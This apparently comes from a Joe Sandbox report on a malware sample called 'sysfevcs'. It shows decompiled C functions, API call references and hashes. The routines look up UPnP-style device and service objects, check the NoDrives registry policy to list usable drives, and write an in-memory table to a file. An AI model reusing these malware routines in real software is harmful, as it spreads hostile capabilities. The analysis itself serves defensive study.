                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c68f
                                                                                                                                                                                                                                                                  0x0040c698
                                                                                                                                                                                                                                                                  0x0040c6a3
                                                                                                                                                                                                                                                                  0x0040c6b3
                                                                                                                                                                                                                                                                  0x0040c6c4
                                                                                                                                                                                                                                                                  0x0040c6c6
                                                                                                                                                                                                                                                                  0x0040c6d7
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6ea
                                                                                                                                                                                                                                                                  0x0040c6f3
                                                                                                                                                                                                                                                                  0x0040c6fb
                                                                                                                                                                                                                                                                  0x0040c703
                                                                                                                                                                                                                                                                  0x0040c713
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c71b
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c725
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c733
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c73d
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x0040c745
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c758
                                                                                                                                                                                                                                                                  0x0040c75e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C6BC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C70B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C71F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C737
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: device$deviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                  • Opcode ID: 8821eec2211d46de2a1f32b3609261cf7a0dfdf6b7a2cf47af531bb2dbcbf3b8
                                                                                                                                                                                                                                                                  • Instruction ID: 532aa4dde8cf7c978606d0783557ede9d9c92c9104aa6674e128487fd0e03548
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8821eec2211d46de2a1f32b3609261cf7a0dfdf6b7a2cf47af531bb2dbcbf3b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A131DA75A0020ADFCB14DF98C884BAFB7B5BF48304F108669E515B73A0D778AA45CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                                                                                                  			E0040C461() {
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                  					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                  						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                  						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                  							L6:
                                                                                                                                                                                                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040BF20( *(_t85 - 0x10), L"serviceType");
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                  									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                  										L10:
                                                                                                                                                                                                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L12:
                                                                                                                                                                                                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									L13:
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L19:
                                                                                                                                                                                                                                                                  				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c467
                                                                                                                                                                                                                                                                  0x0040c470
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c480
                                                                                                                                                                                                                                                                  0x0040c484
                                                                                                                                                                                                                                                                  0x0040c48d
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c573
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4af
                                                                                                                                                                                                                                                                  0x0040c4b8
                                                                                                                                                                                                                                                                  0x0040c4c3
                                                                                                                                                                                                                                                                  0x0040c4d3
                                                                                                                                                                                                                                                                  0x0040c4e4
                                                                                                                                                                                                                                                                  0x0040c4e6
                                                                                                                                                                                                                                                                  0x0040c4f7
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c50a
                                                                                                                                                                                                                                                                  0x0040c513
                                                                                                                                                                                                                                                                  0x0040c51b
                                                                                                                                                                                                                                                                  0x0040c523
                                                                                                                                                                                                                                                                  0x0040c533
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c53b
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c545
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c553
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c55d
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x0040c565
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c578
                                                                                                                                                                                                                                                                  0x0040c57e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C4DC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C52B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C53F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C557
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: service$serviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                  • Opcode ID: 35a86a95f943aca3dfe219b5fe5441f437489e929dbbc6b6899da0c23cce14ea
                                                                                                                                                                                                                                                                  • Instruction ID: cc6604a93b73a9dd26e6b7eb0b4db72dd5c120a31dbd941355632c204e5cc99b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35a86a95f943aca3dfe219b5fe5441f437489e929dbbc6b6899da0c23cce14ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC31FD75A0011AEBCB14DF98DC84AAFB7B5AF48304F108669E514B73A0D738A985CB94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004049E0() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				long _v20;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				int _v36;
                                                                                                                                                                                                                                                                  				void* _t44;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v20 = GetLogicalDrives();
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0x80000002;
                                                                                                                                                                                                                                                                  				_v8 = 0x80000001;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				while(_v24 < 2) {
                                                                                                                                                                                                                                                                  					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						_v36 = 4;
                                                                                                                                                                                                                                                                  						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                  							_v16 = _v16 | _v32;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						RegCloseKey(_v28);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return  !_v16 & _v20;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x004049ec
                                                                                                                                                                                                                                                                  0x004049ef
                                                                                                                                                                                                                                                                  0x004049f6
                                                                                                                                                                                                                                                                  0x004049fd
                                                                                                                                                                                                                                                                  0x00404a04
                                                                                                                                                                                                                                                                  0x00404a16
                                                                                                                                                                                                                                                                  0x00404a3c
                                                                                                                                                                                                                                                                  0x00404a3e
                                                                                                                                                                                                                                                                  0x00404a45
                                                                                                                                                                                                                                                                  0x00404a69
                                                                                                                                                                                                                                                                  0x00404a77
                                                                                                                                                                                                                                                                  0x00404a77
                                                                                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                                                                                  0x00404a13
                                                                                                                                                                                                                                                                  0x00404a13
                                                                                                                                                                                                                                                                  0x00404a91

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLogicalDrives.KERNEL32 ref: 004049E6
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404A34
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404A61
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00404A7E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • NoDrives, xrefs: 00404A58
                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404A27
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                                  • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                                  • Opcode ID: 9409f5f2476fbb1cfb48f401b5588662eeb023834a81a6b5a0276b8bcd01b5a6
                                                                                                                                                                                                                                                                  • Instruction ID: 7c4b250e2e372944b684dead308e34dd4c265bb9b8d3a23af7e8a0b56d6b1af5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9409f5f2476fbb1cfb48f401b5588662eeb023834a81a6b5a0276b8bcd01b5a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11CCB1E4020AABDB10CFD4D945BEEB774FB48704F108169E611B7280D7B86A45CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                                                                                                                  			E004046A0(intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				signed int _v5;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				signed int _v13;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				long _v36;
                                                                                                                                                                                                                                                                  				signed char _t76;
                                                                                                                                                                                                                                                                  				void* _t79;
                                                                                                                                                                                                                                                                  				intOrPtr _t87;
                                                                                                                                                                                                                                                                  				intOrPtr _t88;
                                                                                                                                                                                                                                                                  				signed char _t91;
                                                                                                                                                                                                                                                                  				signed int _t141;
                                                                                                                                                                                                                                                                  				void* _t158;
                                                                                                                                                                                                                                                                  				void* _t159;
                                                                                                                                                                                                                                                                  				void* _t160;
                                                                                                                                                                                                                                                                  				void* _t169;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v5 = 0;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				_t111 = _a12;
                                                                                                                                                                                                                                                                  				_t76 = E0040AF90(_a12, _a16);
                                                                                                                                                                                                                                                                  				_t159 = _t158 + 8;
                                                                                                                                                                                                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  					_t79 = E0040AF30(_t111, _a12);
                                                                                                                                                                                                                                                                  					_t160 = _t159 + 4;
                                                                                                                                                                                                                                                                  					_v12 = _t79;
                                                                                                                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                                                                                                                  						_v5 = 1;
                                                                                                                                                                                                                                                                  						_v13 = 0;
                                                                                                                                                                                                                                                                  						_v20 = 0;
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							_t169 = _v20 -  *0x412f6c; // 0x0
                                                                                                                                                                                                                                                                  							if(_t169 >= 0) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v24 = _v20 * 0x110 +  *0x412f68;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                                                                                                                                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                                                                                                                                                                                                  								E00408990( *((intOrPtr*)(_v24 + 0x108)));
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00408A00(_a12, _a16);
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                                                                                                                                                                                                  								E00408990( *((intOrPtr*)(_v24 + 0x100)));
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040A8A0( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                                                                  								E004059C0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                  								_t160 = _t160 + 0x3c;
                                                                                                                                                                                                                                                                  								_v13 = 1;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							_t91 = E00404210(_a16, _v12, _a12, _a16, 1);
                                                                                                                                                                                                                                                                  							_t160 = _t160 + 0x10;
                                                                                                                                                                                                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								 *0x412f6c = 0;
                                                                                                                                                                                                                                                                  								_v5 = 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990(_v12);
                                                                                                                                                                                                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  							_v28 = CreateFileW(0x413180, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                                                                                                                                                                                                  							if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_v32 = 0;
                                                                                                                                                                                                                                                                  								while(1) {
                                                                                                                                                                                                                                                                  									__eflags = _v32 -  *0x412f6c; // 0x0
                                                                                                                                                                                                                                                                  									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t87 =  *0x412f68; // 0x0
                                                                                                                                                                                                                                                                  									_t88 =  *0x412f68; // 0x0
                                                                                                                                                                                                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                                                                                                                                                                                                  									_t141 = _v32 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t141;
                                                                                                                                                                                                                                                                  									_v32 = _t141;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								FlushFileBuffers(_v28);
                                                                                                                                                                                                                                                                  								CloseHandle(_v28);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				return _v5;
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x004046a8
                                                                                                                                                                                                                                                                  0x004046b1
                                                                                                                                                                                                                                                                  0x004046bb
                                                                                                                                                                                                                                                                  0x004046bf
                                                                                                                                                                                                                                                                  0x004046c4
                                                                                                                                                                                                                                                                  0x004046cc
                                                                                                                                                                                                                                                                  0x004046d6
                                                                                                                                                                                                                                                                  0x004046db
                                                                                                                                                                                                                                                                  0x004046de
                                                                                                                                                                                                                                                                  0x004046e5
                                                                                                                                                                                                                                                                  0x004046eb
                                                                                                                                                                                                                                                                  0x004046ef
                                                                                                                                                                                                                                                                  0x004046f3
                                                                                                                                                                                                                                                                  0x00404705
                                                                                                                                                                                                                                                                  0x00404708
                                                                                                                                                                                                                                                                  0x0040470e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404723
                                                                                                                                                                                                                                                                  0x00404732
                                                                                                                                                                                                                                                                  0x00404741
                                                                                                                                                                                                                                                                  0x0040474d
                                                                                                                                                                                                                                                                  0x00404768
                                                                                                                                                                                                                                                                  0x00404774
                                                                                                                                                                                                                                                                  0x00404784
                                                                                                                                                                                                                                                                  0x00404798
                                                                                                                                                                                                                                                                  0x004047c6
                                                                                                                                                                                                                                                                  0x004047d2
                                                                                                                                                                                                                                                                  0x004047ee
                                                                                                                                                                                                                                                                  0x004047f3
                                                                                                                                                                                                                                                                  0x004047f6
                                                                                                                                                                                                                                                                  0x00404734
                                                                                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404732
                                                                                                                                                                                                                                                                  0x00404805
                                                                                                                                                                                                                                                                  0x00404807
                                                                                                                                                                                                                                                                  0x00404817
                                                                                                                                                                                                                                                                  0x0040481c
                                                                                                                                                                                                                                                                  0x00404822
                                                                                                                                                                                                                                                                  0x00404824
                                                                                                                                                                                                                                                                  0x00404826
                                                                                                                                                                                                                                                                  0x00404830
                                                                                                                                                                                                                                                                  0x00404830
                                                                                                                                                                                                                                                                  0x00404824
                                                                                                                                                                                                                                                                  0x00404838
                                                                                                                                                                                                                                                                  0x00404844
                                                                                                                                                                                                                                                                  0x00404846
                                                                                                                                                                                                                                                                  0x00404866
                                                                                                                                                                                                                                                                  0x00404869
                                                                                                                                                                                                                                                                  0x0040486d
                                                                                                                                                                                                                                                                  0x0040486f
                                                                                                                                                                                                                                                                  0x00404881
                                                                                                                                                                                                                                                                  0x00404884
                                                                                                                                                                                                                                                                  0x0040488a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040489b
                                                                                                                                                                                                                                                                  0x004048b1
                                                                                                                                                                                                                                                                  0x004048c2
                                                                                                                                                                                                                                                                  0x0040487b
                                                                                                                                                                                                                                                                  0x0040487b
                                                                                                                                                                                                                                                                  0x0040487e
                                                                                                                                                                                                                                                                  0x0040487e
                                                                                                                                                                                                                                                                  0x004048ce
                                                                                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                                                                                  0x0040486d
                                                                                                                                                                                                                                                                  0x00404846
                                                                                                                                                                                                                                                                  0x004046e5
                                                                                                                                                                                                                                                                  0x004048e3
                                                                                                                                                                                                                                                                  0x004048f1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00412F50,?,?,00000000,0040A267,006A0266,?,0040A283,00000000,0040B53C,?), ref: 004046B1
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00413180,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A267,006A0266), ref: 00404860
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004048C2
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004048CE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004048D8
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00412F50,?,?,00000000,0040A267,006A0266,?,0040A283,00000000,0040B53C,?), ref: 004048E3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
